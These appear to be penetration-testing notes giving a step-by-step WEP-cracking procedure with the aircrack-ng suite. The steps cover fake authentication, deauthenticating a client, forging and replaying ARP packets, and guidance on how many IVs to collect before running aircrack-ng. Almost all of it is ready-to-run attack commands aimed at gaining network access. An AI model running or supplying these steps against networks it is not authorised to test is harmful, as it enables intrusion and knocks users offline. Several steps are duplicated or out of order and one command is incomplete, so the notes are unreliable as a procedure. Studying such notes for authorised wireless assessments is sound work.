Start your WiFi card in monitor mode on a specific channel: airmon-ng start wlan1 [CHANNEL]
Run airodump-ng and write to a file: airodump-ng -c [CHANNEL] --bssid [BSSID] -w [FILE] wlan1mon - if you don't specify the channel, the card keeps channel-hopping while you perform an attack, so you will miss frames
Perform the fake authentication attack: aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [OurMACAddress] wlan1mon
Run airodump-ng while performing this attack and write the results to a file so that aircrack-ng can be run against it, using the following commands:
Run airodump with the appropriate settings: airodump-ng -c [CHANNEL] --bssid [BSSID] -w [FILENAME] wlan1mon
Ensure that you are authenticated into the network via a fake authentication attack: aireplay-ng -1 0 -e [ESSID] -a [AP MAC] -h [OurMACAddress] wlan1mon
Use packetforge-ng to generate an ARP request packet with the XOR file: packetforge-ng -0 -a [AP MAC] -h [OurMACAddress] -l [SourceIP e.g. 192.168.1.100] -k [DestinationIP e.g. 192.168.1.255] -y [.xor FILE] -w arprequest
Replay this packet with aireplay-ng (the -r argument is the file written by packetforge-ng -w): aireplay-ng -2 -r arprequest wlan1mon
Inspect the packet to learn more about the network: tcpdump -s 0 -n -e -r
Craft a packet to replay: packetforge-ng -0 -a [AP MAC] -h [OurMACAddress] -l [SourceIP e.g. 192.168.1.100] -k [DestinationIP e.g. 192.168.1.255] -y [.xor FILE] -w arpkorek
Replay this packet with aireplay-ng (again using the file named by -w in the previous step): aireplay-ng -2 -r arpkorek wlan1mon
Run aircrack-ng against the packet capture while replaying to crack the key and get l00t.
Deauthenticate a client connected to the AP: aireplay-ng -0 1 -a [AP MAC] -c [Client MAC] wlan1mon
Wait for a notification in airodump-ng stating that the keystream has been captured; airodump-ng writes the keystream to a .xor file
Attempt to authenticate using the capture: aireplay-ng -1 0 -e [ESSID] -y [.xor FILENAME] -a [AP MAC] -h [OurMACAddress] wlan1mon
We can also modify the above authentication with a re-association interval (the second argument to -1, in seconds) to prevent timeouts: aireplay-ng -1 6000 -e [ESSID] -y [.xor FILENAME] -a [AP MAC] -h [OurMACAddress] wlan1mon
This will give us a foothold to carry out other attacks such as ARP replaying and utilizing aircrack-ng
If we were to pursue this approach we could run the following command: aireplay-ng -3 -b [AP MAC] -h [OurMACAddress] wlan1mon
Finally, we would run aircrack-ng while running the ARP replay attack to get l00t.
I have removed Pyrit as it is no longer contained in the default repos of Kali. I strongly believe that aircrack-ng and coWPAtty are sufficient. However, Pyrit is still useful in some cases, so I have included it in these notes.
The number of initialization vectors (IVs) that you need to determine the WEP key varies dramatically by key length and access point. Typically you need 250,000 or more unique IVs for 64 bit keys and 1.5 million or more for 128 bit keys.
Generally, don't try to crack the WEP key until you have 200,000 IVs or more. If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques.
Start by trying 64 bit keys: "aircrack-ng -n 64 [FILENAME]"
It is surprising how many APs only use 64 bit keys. If it does not find the 64 bit key in 5 minutes, restart aircrack in the generic mode: "aircrack-ng captured-data.cap". Then at each 100,000 IVs mark, retry "aircrack-ng -n 64 captured-data.cap" for 5 minutes.
Once you hit 600,000 IVs, switch to testing 128 bit keys. At this point it is unlikely (but not impossible) that it is a 64 bit key and 600,000 IVs did not crack it. So now try "aircrack-ng captured-data.cap".
Once you hit 2 million IVs, try changing the fudge factor to "-f 4". Run for at least 30 minutes to one hour. Retry, increasing the fudge factor by adding 4 to it each time. Another time to try increasing the fudge factor is when aircrack-ng stops because it has tried all the keys.